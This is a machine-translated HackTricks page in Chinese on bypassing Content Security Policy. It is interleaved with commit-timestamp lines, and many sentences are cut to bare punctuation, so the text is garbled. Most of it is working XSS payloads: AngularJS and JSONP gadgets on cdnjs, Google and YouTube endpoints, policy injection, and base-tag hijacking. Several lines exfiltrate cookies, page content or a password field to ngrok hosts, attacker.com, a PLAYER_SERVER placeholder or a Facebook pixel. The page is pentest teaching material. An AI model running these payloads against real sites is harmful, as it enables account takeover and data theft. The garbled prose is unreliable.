2024-02-05 20:18:17 +00:00
# 内容安全策略( )
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 20:18:17 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( ) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-05 20:18:17 +00:00
支持HackTricks的其他方式:
2024-01-02 22:21:01 +00:00
2024-02-09 08:09:21 +00:00
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2024-02-05 20:18:17 +00:00
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-02-09 08:09:21 +00:00
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**上关注**我们。
2024-02-05 20:18:17 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
< / details >
2022-04-28 16:01:33 +00:00
2023-07-31 15:59:11 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (3) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2024-02-05 20:18:17 +00:00
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
2023-02-27 09:28:45 +00:00
2024-02-05 20:18:17 +00:00
**黑客见解**\
参与深入探讨黑客的刺激和挑战的内容
2023-02-27 09:28:45 +00:00
2024-01-02 22:21:01 +00:00
**实时黑客新闻**\
2024-02-05 20:18:17 +00:00
通过实时新闻和见解及时了解快节奏的黑客世界
2023-07-14 15:03:41 +00:00
2024-01-02 22:21:01 +00:00
**最新公告**\
2024-02-05 20:18:17 +00:00
随时了解最新的赏金计划发布和重要平台更新
2023-07-14 15:03:41 +00:00
2024-02-05 20:18:17 +00:00
**加入我们的** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ),立即与顶尖黑客合作!
2022-04-28 16:01:33 +00:00
2024-02-05 20:18:17 +00:00
## 什么是CSP
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
内容安全策略( ) , ( ) , , ( ) ,
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
CSP的实施通过**响应头**或将**元素嵌入HTML页面**中进行。根据此策略,浏览器积极执行这些规定,并立即阻止任何检测到的违规行为。
2021-04-23 10:43:58 +00:00
2024-02-05 20:18:17 +00:00
- 通过响应头实施:
```
2021-04-23 10:43:58 +00:00
Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
```
2024-02-05 20:18:17 +00:00
- 通过 meta 标签实现:
```xml
2021-04-23 10:43:58 +00:00
< meta http-equiv = "Content-Security-Policy" content = "default-src 'self'; img-src https://*; child-src 'none';" >
```
2024-02-05 20:18:17 +00:00
### Headers
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
CSP可以使用以下标头来强制执行或监控:
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
* `Content-Security-Policy` : ;
* `Content-Security-Policy-Report-Only` :用于监控;报告违规行为而不阻止它们。适用于在预生产环境中进行测试。
2021-04-23 10:43:58 +00:00
2024-02-09 08:09:21 +00:00
### Defining Resources
2024-02-05 20:18:17 +00:00
CSP限制了加载活动和被动内容的来源,
```bash
2020-07-15 15:43:14 +00:00
default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
2022-12-03 17:35:56 +00:00
report-uri /cspreport
2020-07-15 15:43:14 +00:00
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
```
2023-08-03 19:12:22 +00:00
### 指令
2024-02-09 08:09:21 +00:00
* **script-src**: ,
* **default-src**:在特定获取指令缺失时为获取资源设置默认策略。
* **child-src**:
* **connect-src**:
* **frame-src**:
* **frame-ancestors**:指定哪些来源可以嵌入当前页面,适用于`< frame > `、`< iframe > `、`< object > `、`< embed > `和`< applet > `等元素。
* **img-src**:定义图像的允许来源。
* **font-src**:指定使用`@font-face`加载的字体的有效来源。
* **manifest-src**:定义应用清单文件的允许来源。
* **media-src**:定义加载媒体对象的允许来源。
* **object-src**:定义`< object > `、`< embed > `和`< applet > `元素的允许来源。
* **base-uri**:指定使用`< base > `元素加载的允许URL。
* **form-action**:列出表单提交的有效端点。
* **plugin-types**:
* **upgrade-insecure-requests**:
* **sandbox**:应用类似于`< iframe > `的sandbox属性的限制。
* **report-to**:指定违反策略时将发送报告的组。
* **worker-src**:
* **prefetch-src**:指定将被获取或预获取的资源的有效来源。
* **navigate-to**: ( )
2024-02-05 20:18:17 +00:00
### 来源
2024-02-09 08:09:21 +00:00
* `*` : ,
* `'self'` :允许从相同域加载。
* `'data'` : ( , )
* `'none'` :阻止从任何来源加载。
* `'unsafe-eval'` :允许使用`eval()`和类似方法,出于安全原因不建议使用。
* `'unsafe-hashes'` :启用特定内联事件处理程序。
* `'unsafe-inline'` :允许使用内联资源,如内联`< script > `或`<style>`,出于安全原因不建议使用。
* `'nonce'` : ( )
* `'sha256-<hash>'` :
* `'strict-dynamic'` : ,
* `'host'` :指定特定主机,如`example.com`。
* `https:` :
* `blob:` : ( , )
* `filesystem:` :允许从文件系统加载资源。
* `'report-sample'` :在违规报告中包含违规代码的示例(用于调试)。
* `'strict-origin'` :类似于`'self'`,但确保来源的协议安全级别与文档匹配(只有安全来源才能从安全来源加载资源)。
* `'strict-origin-when-cross-origin'` : ,
* `'unsafe-allow-redirects'` :允许加载将立即重定向到另一个资源的资源。不建议使用,因为会降低安全性。
## 不安全的CSP规则
### `'unsafe-inline'`
2021-04-23 10:43:58 +00:00
```yaml
2023-08-03 19:12:22 +00:00
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
2020-07-15 15:43:14 +00:00
```
2024-02-05 20:18:17 +00:00
工作负载:`"/>< script > alert ( 1 ) ; < / script > `
#### self + 'unsafe-inline' 通过 Iframes
2022-04-19 22:38:50 +00:00
{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %}
[csp-bypass-self-+-unsafe-inline-with-iframes.md ](csp-bypass-self-+-unsafe-inline-with-iframes.md )
{% endcontent-ref %}
2022-06-23 12:52:13 +00:00
### 'unsafe-eval'
2021-04-23 10:43:58 +00:00
```yaml
2023-08-03 19:12:22 +00:00
Content-Security-Policy: script-src https://google.com 'unsafe-eval';
2020-07-15 15:43:14 +00:00
```
2024-02-05 20:18:17 +00:00
有效的有效载荷:
2022-12-03 17:35:56 +00:00
```html
< script src = "data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==" > < / script >
```
2023-02-20 09:58:12 +00:00
### strict-dynamic
2024-02-09 08:09:21 +00:00
如果你可以以某种方式使**允许的 JS 代码创建一个新的脚本标签**在 DOM 中,因为一个允许的脚本正在创建它,**新的脚本标签将被允许执行**。
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
### 通配符 (\*)
2021-04-23 10:43:58 +00:00
```yaml
2023-08-03 19:12:22 +00:00
Content-Security-Policy: script-src 'self' https://google.com https: data *;
2020-07-15 15:43:14 +00:00
```
2024-02-05 20:18:17 +00:00
有效的有效载荷:
2021-04-23 10:43:58 +00:00
```markup
"/>'>< script src = https://attacker-website.com/evil.js > < / script >
"/>'>< script src = data:text/javascript,alert(1337) > < / script >
```
2024-02-05 20:18:17 +00:00
### 缺乏 object-src 和 default-src
2020-07-15 15:43:14 +00:00
2022-09-04 09:37:14 +00:00
{% hint style="danger" %}
2024-02-05 20:18:17 +00:00
**看起来这个方法不再有效**
2022-09-04 09:37:14 +00:00
{% endhint %}
2021-04-23 10:43:58 +00:00
```yaml
Content-Security-Policy: script-src 'self' ;
2020-07-15 15:43:14 +00:00
```
2024-02-05 20:18:17 +00:00
有效的有效载荷:
2021-04-23 10:43:58 +00:00
```markup
< object data = "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" > < / object >
2022-10-28 09:19:40 +00:00
">'>< object type = "application/x-shockwave-flash" data = 'https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain= \"})))}catch(e) {alert(1337)}//' >
2021-04-23 10:43:58 +00:00
< param name = "AllowScriptAccess" value = "always" > < / object >
```
2023-08-03 19:12:22 +00:00
### 文件上传 + 'self'
```yaml
Content-Security-Policy: script-src 'self'; object-src 'none' ;
```
2024-02-05 20:18:17 +00:00
如果您可以上传一个JS文件, :
2023-08-03 19:12:22 +00:00
有效载荷:
2021-04-23 10:43:58 +00:00
```markup
"/>'>< script src = "/uploads/picture.png.js" > < / script >
```
2024-02-05 20:18:17 +00:00
然而,服务器很可能正在**验证上传的文件**,并且只允许您**上传特定类型的文件**。
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
此外, ( : ) , , , , , ,
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
因此, ,
2020-07-15 15:43:14 +00:00
2024-01-02 22:21:01 +00:00
### 第三方端点 + ('unsafe-eval')
2022-12-03 17:35:56 +00:00
{% hint style="warning" %}
2024-02-05 20:18:17 +00:00
对于以下一些有效载荷,**`unsafe-eval`甚至都不是必需的**。
2022-12-03 17:35:56 +00:00
{% endhint %}
2021-04-23 10:43:58 +00:00
```yaml
2023-08-03 19:12:22 +00:00
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
2021-04-23 10:43:58 +00:00
```
2024-02-05 20:18:17 +00:00
加载一个有漏洞的 Angular 版本并执行任意的 JS:
```xml
2021-04-23 10:43:58 +00:00
< script src = "https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js" > < / script >
< div ng-app > {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} < / div >
2023-01-02 20:17:43 +00:00
">< script src = "https://cdnjs.cloudflare.com/angular.min.js" > < / script > < div ng-app ng-csp > {{$eval.constructor('alert(1)')()}}< / div >
">< script src = "https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js" > < / script >
< div ng-app ng-csp id = p ng-click = $event.view.alert(1337) >
2023-01-04 12:21:48 +00:00
With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
< script / src = https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js > < / script >
< iframe / ng-app / ng-csp / srcdoc = "
2023-08-03 19:12:22 +00:00
< script / src = https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js >
< / script >
< img / ng-app / ng-csp / src / ng-o { { } } n-error = $event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain) > "
2023-01-04 12:21:48 +00:00
>
2020-07-15 15:43:14 +00:00
```
2024-02-09 08:09:21 +00:00
#### 使用 Angular + 一个返回`window`对象的函数库的有效载荷([查看此文章](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)) :
2023-01-02 20:17:43 +00:00
{% hint style="info" %}
2024-02-09 08:09:21 +00:00
该文章显示您可以从`cdn.cloudflare.com`( )
2023-01-02 20:17:43 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
```markup
< script src = "https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js" > < / script >
< script src = "https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" / > < / script >
2023-01-02 20:17:43 +00:00
< div ng-app ng-csp >
2023-08-03 19:12:22 +00:00
{{$on.curry.call().alert(1)}}
{{[].empty.call().alert([].empty.call().document.domain)}}
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
2023-01-02 20:17:43 +00:00
< / div >
< script src = "https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js" > < / script >
< script src = "https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js" > < / script >
< div ng-app ng-csp >
2023-08-03 19:12:22 +00:00
{{$on.curry.call().alert('xss')}}
2023-01-02 20:17:43 +00:00
< / div >
< script src = "https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js" > < / script >
< script src = "https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js" > < / script >
< div ng-app ng-csp >
2023-08-03 19:12:22 +00:00
{{[].erase.call().alert('xss')}}
2023-01-02 20:17:43 +00:00
< / div >
2023-08-03 19:12:22 +00:00
```
2024-02-05 20:18:17 +00:00
#### 滥用谷歌 reCAPTCHA JS 代码
2023-08-02 15:09:22 +00:00
2024-02-09 08:09:21 +00:00
根据[**这篇 CTF 解密**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?\_x\_tr\_sl=es& \_x\_tr\_tl=en& \_x\_tr\_hl=es& \_x\_tr\_pto=wapp#noteninja-3-solves),您可以滥用 [https://www.google.com/recaptcha/ ](https://www.google.com/recaptcha/ ) 在 CSP 中执行任意 JS 代码,绕过 CSP:
2023-08-02 15:09:22 +00:00
```html
< div
2023-08-03 19:12:22 +00:00
ng-controller="CarouselController as c"
ng-init="c.init()"
2023-08-02 15:09:22 +00:00
>
& #91[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]]
< div carousel > < div slides > < / div > < / div >
< script src = "https://www.google.com/recaptcha/about/js/main.min.js" > < / script >
2020-07-15 15:43:14 +00:00
```
2023-08-09 17:14:49 +00:00
### 第三方端点 + JSONP
2021-04-23 10:43:58 +00:00
```http
2023-03-05 18:12:38 +00:00
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
2020-07-15 15:43:14 +00:00
```
2024-02-09 08:09:21 +00:00
在这种情况下,`script-src` 设置为 `self` 和一个特定的已列入白名单的域名,可以通过使用 JSONP 来绕过。JSONP 端点允许使用不安全的回调方法,这使得攻击者可以执行 XSS, :
2021-04-23 10:43:58 +00:00
```markup
">< script src = "https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1" > < / script >
">< script src = "/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//" > < / script >
```
2023-03-05 18:12:38 +00:00
```html
https://www.youtube.com/oembed?callback=alert;
< script src = "https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})" > < / script >
```
2024-02-09 08:09:21 +00:00
[**JSONBee** ](https://github.com/zigoo0/JSONBee ) **包含了用于绕过不同网站的CSP的现成JSONP端点。**
2023-03-05 18:12:38 +00:00
2024-02-09 08:09:21 +00:00
如果**受信任的端点包含一个开放重定向**,那么将会出现相同的漏洞,因为如果初始端点受信任,则重定向也会受信任。
2023-11-05 22:22:57 +00:00
### 第三方滥用
2024-02-09 08:09:21 +00:00
正如在[以下帖子](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses)中所述, , :
2023-11-05 22:22:57 +00:00
2024-02-05 20:18:17 +00:00
| 实体 | 允许的域 | 能力 |
2023-11-05 22:22:57 +00:00
|--------|----------------|--------------|
2024-02-05 20:18:17 +00:00
| Facebook | www.facebook.com, *.facebook.com | 窃取 |
| Hotjar | *.hotjar.com, ask.hotjar.io | 窃取 |
2023-11-05 22:22:57 +00:00
| Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | 执行 |
2024-02-05 20:18:17 +00:00
| Amazon CloudFront | *.cloudfront.net | 窃取,执行 |
| Amazon AWS | *.amazonaws.com | 窃取,执行 |
| Azure Websites | *.azurewebsites.net, * .azurestaticapps.net | 窃取,执行 |
| Salesforce Heroku | *.herokuapp.com | 窃取,执行 |
| Google Firebase | *.firebaseapp.com | 窃取,执行 |
2023-11-05 22:22:57 +00:00
2024-02-09 08:09:21 +00:00
如果在目标的CSP中发现任何允许的域, ,
2023-11-05 22:22:57 +00:00
2024-02-05 20:18:17 +00:00
例如, :
2023-11-05 22:22:57 +00:00
```
Content-Security-Policy ’
```
2024-02-09 08:09:21 +00:00
### Content Security Policy (CSP) Bypass
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
---
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
#### Introduction
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
In this section, we will discuss various techniques to bypass Content Security Policy (CSP) implemented on a web application.
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
#### What is Content Security Policy (CSP)?
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, such as Cross Site Scripting (XSS) and data injection attacks. CSP is implemented by using an HTTP header that allows website administrators to control resources that a browser is allowed to load for a specific page.
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
#### Bypassing CSP
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
There are several ways to bypass CSP protections, including:
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
1. **Inline Script Execution** : Injecting malicious code directly into HTML attributes or event handlers.
2. **External Script Execution** : Loading external scripts from whitelisted domains.
3. **Data Injection** : Injecting data into script files or using data: URIs.
4. **Nonce Bypass** : Generating or guessing the nonce value used in CSP to allow script execution.
5. **Unsafe Inline** : Using 'unsafe-inline' keyword in the CSP policy to allow inline script execution.
6. **Eval Function** : Using the `eval()` function to execute arbitrary code.
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
By understanding these techniques, a penetration tester can effectively test the security of a web application and provide recommendations for improving CSP configurations.
2023-11-05 22:22:57 +00:00
```
Content-Security-Policy
```
2024-02-09 08:09:21 +00:00
你应该能够像以往使用[Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/)那样,窃取数据。在这种情况下,你可以按照以下一般步骤操作:
2023-11-05 22:22:57 +00:00
2024-02-09 08:09:21 +00:00
1. 在这里创建一个Facebook开发者账户。
2024-02-05 20:18:17 +00:00
1. 创建一个新的“Facebook登录”应用程序,
2024-02-09 08:09:21 +00:00
1. 转到“设置 -> 基本信息”并获取你的“应用ID”。
1. 在你想要从中窃取数据的目标网站上,
1. 转到你的应用程序“事件管理器”, ( , : )
1. 选择“测试事件”选项卡,查看“你的”网站发送的事件。
2023-11-05 22:22:57 +00:00
2024-02-09 08:09:21 +00:00
然后, , , , , :
2023-11-05 22:22:57 +00:00
```JavaScript
fbq('init', '1279785999289471');
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
```
2024-02-05 20:18:17 +00:00
### 通过RPO( )
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
除了前面提到的重定向绕过路径限制之外, ( )
2023-11-03 13:40:31 +00:00
2024-02-05 20:18:17 +00:00
例如,
2023-11-03 13:40:31 +00:00
```html
< script src = "https://example.com/scripts/react/..%2fangular%2fangular.js" > < / script >
```
2024-02-09 08:09:21 +00:00
浏览器最终将加载 `https://example.com/scripts/angular/angular.js` 。
2023-11-03 13:40:31 +00:00
2024-02-09 08:09:21 +00:00
这是因为对于浏览器来说,您正在加载位于 `https://example.com/scripts/react/` 下名为 `..%2fangular%2fangular.js` 的文件,这与 CSP 兼容。
2023-11-03 13:40:31 +00:00
2024-02-09 08:09:21 +00:00
因此,它们将对其进行解码,有效地请求 `https://example.com/scripts/react/../angular/angular.js` ,这等同于 `https://example.com/scripts/angular/angular.js` 。
2023-11-03 13:40:31 +00:00
2024-02-09 08:09:21 +00:00
通过**利用浏览器和服务器在 URL 解释方面的不一致性,可以绕过路径规则**。
2023-11-03 13:40:31 +00:00
2024-02-09 08:09:21 +00:00
解决方案是在服务器端不将 `%2f` 视为 `/` ,确保浏览器和服务器之间的一致解释,以避免此问题。
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
在线示例:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
### Iframes JS 执行
2020-07-15 15:43:14 +00:00
2022-04-19 22:38:50 +00:00
{% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
[iframes-in-xss-and-csp.md ](../xss-cross-site-scripting/iframes-in-xss-and-csp.md )
2021-10-20 00:55:49 +00:00
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
### 缺少 **base-uri**
2022-03-21 17:05:35 +00:00
2024-02-09 08:09:21 +00:00
如果缺少 **base-uri** 指令,您可以滥用它执行 [**悬挂标记注入** ](../dangling-markup-html-scriptless-injection/ )。
2022-03-21 17:05:35 +00:00
2024-02-09 08:09:21 +00:00
此外,如果页面使用相对路径加载脚本(如 `<script src="/js/app.js">` )并使用 **Nonce** ,您可以滥用 **base** **tag** 使其从 **您自己的服务器加载** 脚本以实现 XSS。\
如果易受攻击的页面使用 **httpS** 加载,请使用一个 httpS URL 在 base 中。
2022-03-21 17:05:35 +00:00
```html
< base href = "https://www.attacker.com/" >
```
2023-08-03 19:12:22 +00:00
### AngularJS 事件
2022-03-21 17:05:35 +00:00
2024-02-09 08:09:21 +00:00
一种名为内容安全策略( ) , , , ,
2024-02-05 20:18:17 +00:00
通过将这个数组指向`orderBy`过滤器,可以对其进行迭代,利用终端元素(`window`对象)来触发类似`alert()`的全局函数。下面演示的代码片段阐明了这个过程:
```xml
2021-11-14 19:46:18 +00:00
< input % 20id = x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27 > #x
2020-07-15 15:43:14 +00:00
?search=< input id = x ng-focus = $event.path|orderBy:'(z=alert)(document.cookie)' > #x
```
2024-02-09 08:09:21 +00:00
这段代码突出了使用`ng-focus`指令来触发事件,利用`$event.path|orderBy`来操作`path`数组,并利用`window`对象执行`alert()`函数,从而揭示`document.cookie`。
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
**在** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet** ](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet ) **中查找其他Angular绕过方法**
### AngularJS和白名单域
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
```
2024-02-09 08:09:21 +00:00
## CSP绕过
2024-02-05 20:18:17 +00:00
2024-02-09 08:09:21 +00:00
在Angular JS应用程序中, , ,
2020-07-15 15:43:14 +00:00
2024-01-02 22:21:01 +00:00
有效载荷:
2022-08-12 14:24:34 +00:00
```html
< script src = //ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337 > < / script >
2020-07-15 15:43:14 +00:00
ng-app"ng-csp ng-click=$event.view.alert(1337)>< script src = //ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js > < / script >
2022-12-03 17:35:56 +00:00
<!-- no longer working -->
2022-08-12 14:24:34 +00:00
< script src = "https://www.googleapis.com/customsearch/v1?callback=alert(1)" >
2020-07-15 15:43:14 +00:00
```
2024-02-05 20:18:17 +00:00
其他JSONP任意执行端点可以在[**这里**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)找到(其中一些已被删除或修复)
2020-07-15 15:43:14 +00:00
2023-11-03 13:40:31 +00:00
### 通过重定向绕过
2024-02-05 20:18:17 +00:00
当CSP遇到服务器端重定向时会发生什么? ,
2023-11-03 13:40:31 +00:00
2024-02-05 20:18:17 +00:00
然而,根据[CSP规范4.2.2.3. 路径和重定向](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects)中的描述,如果重定向导致到不同路径,它可以绕过原始限制。
2023-11-03 13:40:31 +00:00
2024-01-02 22:21:01 +00:00
这里有一个例子:
2023-11-03 13:40:31 +00:00
```html
<!DOCTYPE html>
< html >
< head >
< meta http-equiv = "Content-Security-Policy" content = "script-src http://localhost:5555 https://www.google.com/a/b/c/d" >
< / head >
< body >
< div id = userContent >
< script src = "https://https://www.google.com/test" > < / script >
< script src = "https://https://www.google.com/a/test" > < / script >
< script src = "http://localhost:5555/301" > < / script >
< / div >
< / body >
< / html >
```
2024-02-09 08:09:21 +00:00
如果 CSP 设置为 `https://www.google.com/a/b/c/d` ,由于路径被考虑在内,`/test` 和 `/a/test` 脚本都将被 CSP 阻止。
2023-11-03 13:40:31 +00:00
2024-02-09 08:09:21 +00:00
然而,最终的 `http://localhost:5555/301` 将在服务器端**重定向到 `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//` **。由于这是一个重定向,**路径不被考虑**,因此**脚本可以被加载**,从而绕过路径限制。
2023-11-03 13:40:31 +00:00
2024-02-05 20:18:17 +00:00
通过这种重定向,即使完全指定了路径,仍将被绕过。
2023-11-03 13:40:31 +00:00
2024-02-09 08:09:21 +00:00
因此,最佳解决方案是确保网站没有任何开放的重定向漏洞,并且 CSP 规则中没有可以被利用的域。
2023-11-03 13:40:31 +00:00
2024-02-09 08:09:21 +00:00
### 使用悬挂标记绕过 CSP
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
阅读[此处的方法](../dangling-markup-html-scriptless-injection/)。
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
### 'unsafe-inline'; img-src \*; 通过 XSS
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
default-src 'self' 'unsafe-inline'; img-src *;
```
2024-02-09 08:09:21 +00:00
`'unsafe-inline'` 意味着可以在代码中执行任何脚本(
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
您可以通过图像传输数据来绕过此 CSP( , , , ) :
2020-07-15 15:43:14 +00:00
```javascript
< script > fetch ( 'http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23' ) . then ( _ => _ . text ( ) ) . then ( _ => new Image ( ) . src = 'http://PLAYER_SERVER/?' + _ ) < / script >
```
2024-02-05 20:18:17 +00:00
From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle ](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle )
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
您还可以滥用此配置来**加载插入图像内部的JavaScript代码**。例如, , ( ) , **它** :
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 使用Service Workers
2022-06-28 23:06:59 +00:00
2024-01-02 22:21:01 +00:00
Service workers的**`importScripts`**函数不受CSP限制:
2022-12-20 11:25:07 +00:00
{% content-ref url="../xss-cross-site-scripting/abusing-service-workers.md" %}
[abusing-service-workers.md ](../xss-cross-site-scripting/abusing-service-workers.md )
{% endcontent-ref %}
2023-08-03 19:12:22 +00:00
### 策略注入
2023-01-04 12:21:48 +00:00
2024-02-05 20:18:17 +00:00
**研究:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection** ](https://portswigger.net/research/bypassing-csp-with-policy-injection )
2023-01-04 12:21:48 +00:00
#### Chrome
2024-02-09 08:09:21 +00:00
如果您发送的**参数**被**粘贴到** **策略**的**声明**中,则可以以某种方式**更改**使**其无效**的**策略** 。您可以使用以下任何一种绕过方式允许脚本'unsafe-inline':
2023-01-04 12:21:48 +00:00
```bash
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
```
2024-02-05 20:18:17 +00:00
因为这个指令会**覆盖现有的 script-src 指令**。\
你可以在这里找到一个例子:[http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
2023-01-04 12:21:48 +00:00
#### Edge
2024-02-05 20:18:17 +00:00
在 Edge 中更简单。如果你可以在 CSP 中添加这个:**`;_`**,
例子:[http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
2023-01-04 12:21:48 +00:00
2024-02-09 08:09:21 +00:00
### img-src \*; 通过 XSS( )
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
注意缺少指令 `'unsafe-inline'` \
这次你可以让受害者通过**XSS**加载一个在**你控制下**的页面,使用 `<iframe` 。这次你将让受害者访问你想要提取信息的页面(**CSRF**)。你无法访问页面的内容,但如果你可以**控制页面加载所需的时间**,你就可以提取所需的信息。
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
